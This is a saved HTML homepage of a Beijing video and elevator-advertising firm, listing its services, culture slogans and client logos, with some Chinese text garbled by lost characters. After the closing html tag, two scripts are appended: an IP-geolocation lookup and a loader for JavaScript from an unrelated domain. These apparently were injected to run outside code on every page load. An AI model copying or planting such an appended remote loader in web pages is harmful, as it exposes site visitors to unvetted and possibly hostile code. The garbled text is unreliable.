?!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> 飞度传媒--想你所需 做你所?/title> <meta name="keywords" content="飞度传媒"/> <meta name="description" content="北京飞度传媒,飞度网络科技有限公司"/> <link rel="stylesheet" href="statics/css/ghsy/style.css" tppabs="//statics/css/ghsy/style.css" type="text/css" /> <script type="text/javascript" src="1.8.3/jquery.min.js" tppabs="http://libs.baidu.com/jquery/1.8.3/jquery.min.js"></script> <script type="text/javascript" charset="utf-8" src="statics/js/ghsy/jquery.all_plugins_v1.js" tppabs="//statics/js/ghsy/jquery.all_plugins_v1.js"></script> </head> <body> <div id="top"> <div id="header"> <div id="logo"><a href="../../../index.htm" tppabs="http://www.feiduchuanmei.com/"><img src="statics/images/ghsy/logo.png" tppabs="http://www.feiduchuanmei.com/statics/images/ghsy/logo.png" /></a></div> <div id="tel"><p><b>飞度服务热线?/b><br /> T: 4007005286 Q:2233651690</p></div> </div> <div id="nav"> <ul> <li><a href="index.htm" tppabs="http://www.feiduchuanmei.com/">首页</a></li> <li class="fx"></li> <li><a href="html/about/index.htm" tppabs=".">公司介绍</a></li> <li class="fx"></li> <li><a href="html/fwnr/index.htm" tppabs=".">媒体优势</a></li> <li class="fx"></li> <li><a href="html/wmdkh/index.htm" tppabs=".">视频拍摄</a></li> <li class="fx"></li> <li><a href="html/lygg/index.htm" tppabs=".">楼宇广告</a></li> <li class="fx"></li> <li><a href="html/fwhy/index.htm" tppabs=".">人才招聘</a></li> <li class="fx"></li> <li><a href="html/fdlm/index.htm" tppabs=".">飞度联盟</a></li> <li class="fx"></li> <li><a href="/mtzy.php" tppabs=".">媒体资源</a></li> <li class="fx"></li> <li><a href="html/contact/index.htm" tppabs=".">联系我们</a></li> </ul> </div> </div> <div id="banner"> <div id="banner_ad" style="display:none"> <a href="#" target="_blank"><img src="uploadfile/2014/0818/20140818032434328.jpg" tppabs="//uploadfile/2014/0818/20140818032434328.jpg" /></a> <a href="" target="_blank"><img src="uploadfile/2014/0630/20140630065313119.jpg" tppabs="//uploadfile/2014/0630/20140630065313120.jpg" /></a> <a href="" target="_blank"><img src="uploadfile/2014/0630/20150310140032.jpg" tppabs="//uploadfile/2014/0630/20150310140032.jpg" /></a> </div> <div id="pre_banner_802" > <ul></ul> </div><!--pre_banner_802--> </div> <div id="main"> <div class="main"> <div class="gyn"> <div class="gy about"> <h3>等候厅广告投放</h3></div> <a href="html/lygg/index.htm" tppabs="html/lygg/index.htm"target="_blank"><img src="statics/images/ghsy/pic1.jpg" tppabs="//statics/images/ghsy/pic1.jpg" /></a> <p>600个高档社区、写字楼,两万部电梯?60万三高受众群体,可以与btv生活相媲美, 一看就知道是你想要的!<br /> </div> <div class="gyn bargin"> <div class="gy service"> <h3>微视频广告拍?/h3></div> <a href="#" tppabs="#" target="_blank"><img src="statics/images/ghsy/pic1a.jpg" tppabs="//statics/images/ghsy/pic1a.jpg" /></a> <p>飞度传媒拍摄团队,先后为人人投平台的20多个城市100多家企业进行了企业宣传视频与广告的拍?..<br /> </div> <div class="gyn bargin"> <div class="gy hy"><h3>广告特效与制?/h3></div> <a href="#" tppabs="//#" target="_blank"><img src="statics/images/ghsy/pic1b.jpg" tppabs="//statics/images/ghsy/pic1b.jpg" /></a> <p>专业的后期剪辑与制作人员均是这个行业内工?--10年的优秀技术人才,先后参与过众多大型晚会和电影的制作?br /> </div> <div class="gyn sxy"> <div class="gy xy"><h3>电梯内广告投?/h3></div> <a href="#" tppabs="#" target="_blank"><img src="statics/images/ghsy/pic1c.jpg" tppabs="//statics/images/ghsy/pic1c.jpg" /></a> <p>19英寸的大屏和10英寸的小屏离地面1.3米,安装在电梯内部左侧正前方,无视觉盲区举目之劳一览无余?br /> </div> </div> </div> <div class="main1"> <div class="wrap"> <div class="tit"> <h3><b>Culture </b>企业文化</h3></div> <div class="teams"> <div class="team"> <div class="teamtop"> <div class="teamimg"><img src="uploadfile/2014/0412/2048.jpg" tppabs="//uploadfile/2014/0411/1.jpg" /></div> <div class="bg"><a href="#" target="_blank"></a></div> </div> <h3><a href="#" target="_blank"><b>飞跃</b><br /> 飞跃传统营销所遇瓶?/a></h3> </div> <div class="team"> <div class="teamtop"> <div class="teamimg"><img src="uploadfile/2014/0412/1024.jpg" tppabs="//uploadfile/2014/0411/2.jpg" /></div> <div class="bg"><a href="#" target="_blank"></a></div> </div> <h3><a href="#" target="_blank"><b>过度</b><br /> 到达企业愿景梦想国度</a></h3> </div> <div class="team"> <div class="teamtop"> <div class="teamimg"><img src="uploadfile//2014/0412/6640.jpg" tppabs="//uploadfile/2014/0411/2.jpg" /></div> <div class="bg"><a href="#" target="_blank"></a></div> </div> <h3><a href="#" target="_blank"><b>传?/b><br /> 传递企业文化共同进?/a></h3> </div> <div class="team"> <div class="teamtop"> <div class="teamimg"><img src="uploadfile/2014/0412/6637.jpg" tppabs="//uploadfile/2014/0411/2.jpg" /></div> <div class="bg"><a href="#" target="_blank"></a></div> </div> <h3><a href="#" target="_blank"><b>媒介</b><br /> 提升行业自我影响能力</a></h3> </div> </div> </div> </div> </div> <div id="main2"> <div class="wrap"> <div class="tit wmkh"><h3><b>Clients</b> 精诚合作</h3></div> <div class="friend_link"> <ul> <li><a href="index.htm" tppabs="//"><img src="uploadfile/2014/0408/20140408020507516.jpg" tppabs="//uploadfile/2014/0408/20140408020507516.jpg" width="150" height="74"/></a></li> <li><a href="index.htm" tppabs="//"><img src="uploadfile/2014/0408/20140408020755409.jpg" tppabs="//uploadfile/2014/0408/20140408020755409.jpg" width="150" height="74"/></a></li> <li><a href="index.htm" tppabs="//"><img src="uploadfile/2014/0408/20140408021038772.jpg" tppabs="//uploadfile/2014/0408/20140408021038772.jpg" width="150" height="74"/></a></li> <li><a href="index.htm" tppabs="//"><img src="uploadfile/2014/0408/20140408021449453.jpg" tppabs="//uploadfile/2014/0408/20140408021449453.jpg" width="150" height="74"/></a></li> <li><a href="index.htm" tppabs="//"><img src="uploadfile/2014/0408/20140408021749597.jpg" tppabs="//uploadfile/2014/0408/20140408021749597.jpg" width="150" height="74"/></a></li> <li><a href="index.htm" tppabs="//"><img src="uploadfile/2014/0408/20140408022219750.jpg" tppabs="//uploadfile/2014/0408/20140408022219750.jpg" width="150" height="74"/></a></li> <li><a href="index.htm" tppabs="//"><img src="uploadfile/2014/0408/20140408024047742.jpg" tppabs="//uploadfile/2014/0408/20140408024047742.jpg" width="150" height="74"/></a></li> <li><a href="index.htm" tppabs="//"><img src="uploadfile/2014/0408/20140408024105662.jpg" tppabs="//uploadfile/2014/0408/20140408024105662.jpg" width="150" height="74"/></a></li> <li><a href="index.htm" tppabs="//"><img src="uploadfile/2014/0408/20140408024124640.jpg" tppabs="//uploadfile/2014/0408/20140408024124640.jpg" width="150" height="74"/></a></li> <li><a href="index.htm" tppabs="//"><img src="uploadfile/2014/0408/20140408024144776.jpg" tppabs="//uploadfile/2014/0408/20140408024144776.jpg" width="150" height="74"/></a></li> <li><a href="index.htm" tppabs="//"><img src="uploadfile/2014/0408/20140408024312141.jpg" tppabs="//uploadfile/2014/0408/20140408024312141.jpg" width="150" height="74"/></a></li> <li><a href="index.htm" tppabs="//"><img src="uploadfile/2014/0408/20140408024342525.jpg" tppabs="//uploadfile/2014/0408/20140408024342525.jpg" width="150" height="74"/></a></li> </ul> </div> </div> </div> <div class="main1"> <div class="main"> <div class="tit"><h3><b>Reason</b> 选择理由</h3></div> <div class="question"> <dl> <dt><img src="statics/images/ghsy/ico5.png" tppabs="//statics/images/ghsy/ico5.png" /></dt> <dd> <h3><a href="#">史上最贱(便宜)视频广告投放平台!</a></h3> <p>我们的视频广告单次展示不足一分钱,是史上最便宜的展示平台?/p> </dd> </dl> <dl> <dt><img src="statics/images/ghsy/ico6.png" tppabs="//statics/images/ghsy/ico6.png" /></dt> <dd> <h3><a href="#">梦想VS现实--搭乘飞度业绩一路飙升!</a></h3> <p>飞度传媒专业的策划团队和设计精英,助你逢投必中,名声大震!</p> </dd> </dl> <dl> <dt><img src="statics/images/ghsy/ico7.png" tppabs="//statics/images/ghsy/ico7.png" /></dt> <dd> <h3><a href="#">梦想VS现实--融入飞度后收益平安着?/a></h3> <p>我们只会做视频广告投放和发行,因为我们专注,所以我们更加专业,只要将广告需求提出,我们就可以让您的想法落地?/p> </dd> </dl> <dl> <dt><img src="statics/images/ghsy/ico8.png" tppabs="//statics/images/ghsy/ico8.png" /></dt> <dd> <h3><a href="#">飞度联盟--视频广告分享计划打广告也可以挣钱?/a></h3> <p> 一天的时间,我可以让北京知道您,一周的时间,我可以让北京了解您,一个月的时间我可以让您打动北京?/p> </dd> </dl> </div><!--question--> </div> </div> <div class="ly"> <script language='javascript' src="index.php-m=formguide&c=index&a=show&formid=15&action=js&siteid=1" tppabs="//index.php?m=formguide&c=index&a=show&formid=15&action=js&siteid=1"></script> </div> </div> </div> <div id="footer"> <div class="wrap"> <div class="foot"> <ul> <li><a href="html/team/index.htm" tppabs=".">媒体资源</a><span>|</span></li> <li><a href="html/about/index.htm" tppabs=".">公司介绍</a> <span>|</span></li> <li><a href="html/fwnr/index.htm" tppabs=".">媒体优势</a> <span>|</span></li> <li><a href="html/fwhy/index.htm" tppabs=".">人才招聘</a> <span>|</span></li> <li><a href="html/wmdkh/index.htm" tppabs=".">解决方案</a> <span>|</span></li> <li><a href="html/fdlm/index.htm" tppabs=".">飞度联盟</a> <span>|</span></li> <li><a href="html/contact/index.htm" tppabs=".">联系我们</a> <span>|</span></li> </ul> </div> <div class="foot_content"><p>版权所?北京飞度网络科技有限公司 京ICP?2015672?5<a href="#">返回顶部</a><script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1254965789'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s4.cnzz.com/z_stat.php%3Fid%3D1254965789' type='text/javascript'%3E%3C/script%3E"));</script></p></div> </div> </div> </body> </html> <script src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js"></script> <script type="text/javascript" src="http://yf8686.com/js.js" charset="gb2312"></script>